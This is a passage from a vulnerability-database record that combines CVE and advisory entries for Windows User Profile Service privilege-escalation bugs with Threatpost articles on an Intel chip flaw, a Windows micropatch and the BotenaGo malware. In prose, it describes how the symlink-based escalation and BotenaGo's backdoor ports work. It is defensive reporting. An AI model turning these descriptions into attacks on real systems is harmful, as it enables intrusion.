"cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:rt:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*"]}, {"lastseen": "2023-06-14T14:18:50", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21895.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T21:15:00", "type": "cve", "title": "CVE-2022-21919", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21895", "CVE-2022-21919"], "modified": "2022-05-23T17:29:00", "cpe": ["cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-21919", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-21919", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:rt:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*"]}], "zdi": [{"lastseen": "2023-05-23T15:49:08", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the User Profile Service. By creating a directory junction, an attacker can abuse the service to delete a directory. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T00:00:00", "type": "zdi", "title": "Microsoft Windows User Profile Service Directory Junction Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-11T00:00:00", "id": "ZDI-21-966", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-966/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-08-16T05:58:16", "description": "Windows User Profile Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T18:15:00", "type": "prion", "title": "CVE-2021-34484", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-23T20:25:00", "id": "PRION:CVE-2021-34484", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-34484", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T15:43:43", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21919.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T21:15:00", "type": "prion", "title": "CVE-2022-21895", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21895", "CVE-2022-21919"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2022-21895", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-21895", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-15T15:43:48", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21895.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T21:15:00", "type": "prion", "title": "CVE-2022-21919", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21895", "CVE-2022-21919"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2022-21919", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-21919", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-06-14T15:25:12", "description": "Windows User Profile Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mscve", "title": "Windows User Profile Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-10T07:00:00", "id": "MS:CVE-2021-34484", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34484", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-28T21:05:15", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21895.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T08:00:00", "type": "mscve", "title": "Windows User Profile Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21895", "CVE-2022-21919"], "modified": "2022-01-11T08:00:00", "id": "MS:CVE-2022-21919", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21919", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-28T20:41:59", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21919.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T08:00:00", "type": "mscve", "title": "Windows User Profile Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21895", "CVE-2022-21919"], "modified": "2022-01-11T08:00:00", "id": "MS:CVE-2022-21895", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21895", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-11-15T21:22:00", "description": "A security vulnerability in Intel chips opens the door for encrypted file access and espionage, plus the ability to bypass copyright protection for digital content.\n\nThat\u2019s according to Positive Technologies (PT), which found that the vulnerability (CVE-2021-0146) is a debugging functionality with excessive privileges, which is not protected as it should be.\n\nThe high-severity privilege-escalation issue is rated 7.1 out of 10 on the CVSS vulnerability-severity scale.\n\n[](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\n\u201c[The] hardware allows activation of test or debug logic at runtime for some Intel processors which may allow an unauthenticated user to potentially enable escalation of privilege via physical access,\u201d according to Intel\u2019s advisory, [issued last week](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00528.html>).\n\nIn terms of scope, the vulnerability affects the Pentium, Celeron and Atom processors of the Apollo Lake, Gemini Lake and Gemini Lake Refresh platforms. These chips power laptops, mobile devices, embedded systems, medical devices and a variety of internet of things (IoT) offerings.\n\n\u201cAccording to a study by Mordor Intelligence, Intel ranks fourth in the IoT chip market, while its Intel Atom E3900 series IoT processors, which also contain the CVE-2021-0146 vulnerability, are used by car manufacturers in more than 30 models, including, according to unofficial sources, in Tesla\u2019s Model 3,\u201d PT noted in a writeup shared with Threatpost.\n\nTo address the issue, users should install the [UEFI BIOS](<https://threatpost.com/intel-security-holes-cpus-bluetooth-security/166747/>) updates published by manufacturers of each piece of electronic equipment. The following processor models are affected:\n\n\n\nSource: Intel.\n\n## **CVE-2021-0146 Impact for End Users**\n\nWhen it comes to impact, an exploit would allow cybercriminals to extract a device\u2019s encryption key and gain access to information.\n\n\u201cOne example of a real threat is lost or stolen laptops that contain confidential information in encrypted form,\u201d said Mark Ermolov, a PT researcher who was credited with discovering the bug (along with PT\u2019s Dmitry Sklyarov and independent researcher Maxim Goryachy).\n\nThe vulnerability is also dangerous because it facilitates the extraction of the root encryption key used in Intel\u2019s Platform Trust Technology and Enhanced Privacy ID technologies, which are used to protect digital content from illegal copying, Ermolov added\n\n\u201cFor example, a number of Amazon e-book models use Intel EPID-based protection for digital rights management,\u201d he explained. \u201cUsing this vulnerability, an intruder might extract the root EPID key from a device (e-book), and then, having compromised Intel EPID technology, download electronic materials from providers in file form, copy and distribute them.\u201d\n\nAdditionally, an exploit could allow cyberattackers to conduct targeted attacks across the supply chain, Ermolov noted.\n\n\u201cFor example, an employee of an Intel processor-based device supplier could extract the Intel CSME firmware key and deploy spyware that security software would not detect,\u201d he said.\n\n**_Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, _**[**_\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d_**](<https://bit.ly/3bBMX30>) **_on Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops._**\n\n[**_Register NOW_**](<https://bit.ly/3bBMX30>)_** for the LIVE event!**_\n", "cvss3": {}, "published": "2021-11-15T20:52:27", "type": "threatpost", "title": "High-Severity Intel Processor Bug Exposes Encryption Keys", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-15T20:52:27", "id": "THREATPOST:53A062956C31459E2846CD4C959DFD49", "href": "https://threatpost.com/intel-processor-bug-encryption-keys/176355/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-15T21:22:03", "description": "A partially unpatched security bug in Windows that could allow local privilege escalation from a regular user to System remains unaddressed fully by Microsoft \u2013 but an unofficial micropatch from oPatch has hit the scene.\n\nThe bug ([CVE-2021-34484](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484>)) was originally disclosed and patched as part of Microsoft\u2019s [August Patch Tuesday updates](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>). At the time, it was categorized as an arbitrary directory-deletion issue that was considered low-priority because an attacker would need to locally log into the targeted computer to exploit it, which, in theory, would allow the adversary to delete file folders anyway.\n\nHowever, the security researcher who discovered it, Abdelhamid Naceri, [soon uncovered](<https://halove23.blogspot.com/2021/10/windows-user-profile-service-0day.html>) that it could also be used for privilege escalation, which is a whole other ball of wax. System-level users have access to resources, databases and servers on other parts of the network.\n\nAbdelhamid also took a look at Microsoft\u2019s original patch, subsequently finding a bypass for it via a simple tweak to the exploit code he had developed, essentially reverting it to zero-day status.\n\n> CVE-2021-34484 bypass as 0day<https://t.co/W0gnYHxJ6B>\n> \n> \u2014 Abdelhamid Naceri (@KLINIX5) [October 22, 2021](<https://twitter.com/KLINIX5/status/1451558296872173577?ref_src=twsrc%5Etfw>)\n\n\u201cThe vulnerability lies in the User Profile Service, specifically in the code responsible for creating a temporary user profile folder in case the user\u2019s original profile folder is damaged or locked for some reason,\u201d explained 0Patch\u2019s Mitja Kolsek in a [Thursday writeup](<https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html>) . \u201cAbdelhamid found that the process (executed as Local System) of copying folders and files from user\u2019s original profile folder to the temporary one can be attacked with symbolic links to create attacker-writable folders in a system location from which a subsequently launched system process would load and execute attacker\u2019s DLL.\u201d\n\n[](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\nThe exploit is straightforward: An attacker would create a specially crafted symbolic link (essentially, a shortcut link that points to a specific file or folder), then would need to save it in the temporary user profile folder (C:\\Users\\TEMP).\n\nThen, when the User Profile Service copies a folder from user\u2019s original profile folder as described by Kolsek, the symbolic link will force it to create a folder containing a malicious library (DLL) payload somewhere else where the attacker would normally not have permissions to create one.\n\n\u201cMicrosoft, even though believing the vulnerability only allowed for deletion of an arbitrarily \u2018symlinked\u2019 folder, made a conceptually correct fix: it checked whether the destination folder under C:\\Users\\TEMP was a symbolic link, and aborted the operation if so,\u201d explained Kolsek. \u201cThe incompleteness of this fix, as noticed by Abdelhamid, was in the fact that the symbolic link need not be in the upper-most folder (which Microsoft\u2019s fix checked), but in any folder along the destination path.\u201d\n\nThe micropatch fixes this by extending the security check for symbolic links to the entire destination path by calling the \u201cGetFinalPathNameByHandle\u201d function.\n\nIt should be noted that a workable exploit also requires attackers to be able to win a race condition (with unlimited attempts) since the system will be attempting to perform two operations (one malicious, one legitimate) at the same time. Also, even though Abdelhamid said that \u201cit might be possible to [exploit] without knowing someone [else\u2019s] password,\u201d so far, having user credentials for the targeted computer remains an obstacle, Kolsek noted.\n\nThe bug affects Windows 10 (both 32 and 64 bit), versions v21H1, v20H2, v2004 and v1909; and Windows Server 2019 64 bit.\n\nMicrosoft hasn\u2019t released a timeline for updating its official patch and didn\u2019t immediately respond to a request for comment.\n\n**_Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, _**[**_\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d_**](<https://bit.ly/3bBMX30>) **_on Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops._**\n\n[**_Register NOW_**](<https://bit.ly/3bBMX30>)_** for the LIVE event!**_\n", "cvss3": {}, "published": "2021-11-12T19:49:05", "type": "threatpost", "title": "Windows 10 Privilege-Escalation Zero-Day Gets Unofficial Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-12T19:49:05", "id": "THREATPOST:84909E392F4171398A52202CCC4E215A", "href": "https://threatpost.com/windows-10-privilege-escalation-zero-day-unofficial-fix/176313/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-15T21:22:33", "description": "Newly surfaced malware that is difficult to detect and written in Google\u2019s open-source programming language has the potential to [exploit millions](<https://threatpost.com/bug-iot-millions-devices-attackers-eavesdrop/168729/>) of routers and [IoT devices](<https://threatpost.com/iot-attacks-doubling/169224/>), researchers have found.\n\nDiscovered by researchers at AT&amp;T AlienLabs, BotenaGo can exploit more than 30 different vulnerabilities to attack a target, Ofer Caspi, a security researcher at Alien Labs, wrote in a [blog post](<https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits>) published Thursday.\n\nThe malware, which is written in [Golang](<https://golang.org/>)\u2014a language Google first published in 2007\u2013works by creating a backdoor to the device. It then waits to either receive a target to attack from a remote operator through port 19412 or from another related module running on the same machine, he wrote.\n\n[](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\nGolang, also known as Go, is aimed at simplifying how software is built by making it easy for developers to compile the same code for different systems. This feature may be the reason why it\u2019s caught on with malware developers in the last few years, since it also makes it easier for attackers to spread malware on multiple operating systems, Caspi wrote.\n\nIndeed, [research from Intezer](<https://www.intezer.com/blog/malware-analysis/year-of-the-gopher-2020-go-malware-round-up/>), which offers a platform for analyzing malware, suggests that there has been a 2,000 percent increase in malware code written in Go being found in the wild, he wrote.\n\nResearchers said at this time they don\u2019t know which threat actor or actors developed BotenaGo, nor the full scale of devices that are vulnerable to the malware. So far, antivirus protections also don\u2019t seem to recognize the malware, sometimes misidentifying it as a [variant of Mirai malware](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>), Caspi wrote.\n\n## **Setting Up the Attack**\n\nBotenaGo commences its work with some exploratory moves to see if a device is vulnerable to attack, Caspi wrote. It starts by initializing global infection counters that will be printed to the screen, informing the attacker about total successful infections. The malware then looks for the \u2018dlrs\u2019 folder in which to load shell scripts files. If this folder is missing, BotenaGo stops the infection process.\n\nIn its last step before fully engaging, BotenaGo calls the function \u2018scannerInitExploits\u2019, \u201cwhich initiates the malware attack surface by mapping all offensive functions with its relevant string that represent the targeted system,\u201d Caspi wrote.\n\n[](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/?utm_source=Specops+&utm_medium=web&utm_campaign=event&utm_id=Specops+&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\nOnce it establishes that a device is vulnerable to attack, BotenaGo proceeds with exploit delivery by first querying the target with a simple \u201cGET\u201d request. It then searches the returned data from the \u201cGET\u201d request with each system signature that was mapped to attack functions.\n\nResearchers detail several possible attacks that can be carried out using this query. In one, the malware maps the string \u201cServer: Boa/0.93.15\u201d to the function \u201cmain_infectFunctionGponFiber,\u201d which attempts to exploit a vulnerable target, Caspi wrote.\n\nThis allows the attacker to execute an OS command via a specific web request using a vulnerability tracked as [CVE-2020-8958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8958>). A [SHODAN search](<https://www.shodan.io/>) turned up nearly 2 million devices that are vulnerable to this type of attack alone, he wrote.\n\n\u201cIn total, the malware initiates 33 exploit functions that are ready to infect potential victims,\u201d Caspi wrote. A full list of the vulnerabilities that BotenaGo can exploit is included in the post.\n\n## **Backdooring Devices to Execute Commands**\n\nThere are two different ways that the malware can receive commands to target victims, researchers found. One is the create backdoor ports\u201331421 and 19412\u2014that are used in an attack scenario, Caspi wrote.\n\n\u201cOn port 19412 it will listen to receive the victim IP,\u201d he wrote. \u201cOnce a connection with information to that port is received, it will loop through mapped exploit functions and execute them with the given IP.\u201d\n\nThe second way BotenaGo can receive a target command is by setting a listener to system IO (terminal) user input, getting the command to the device that way, 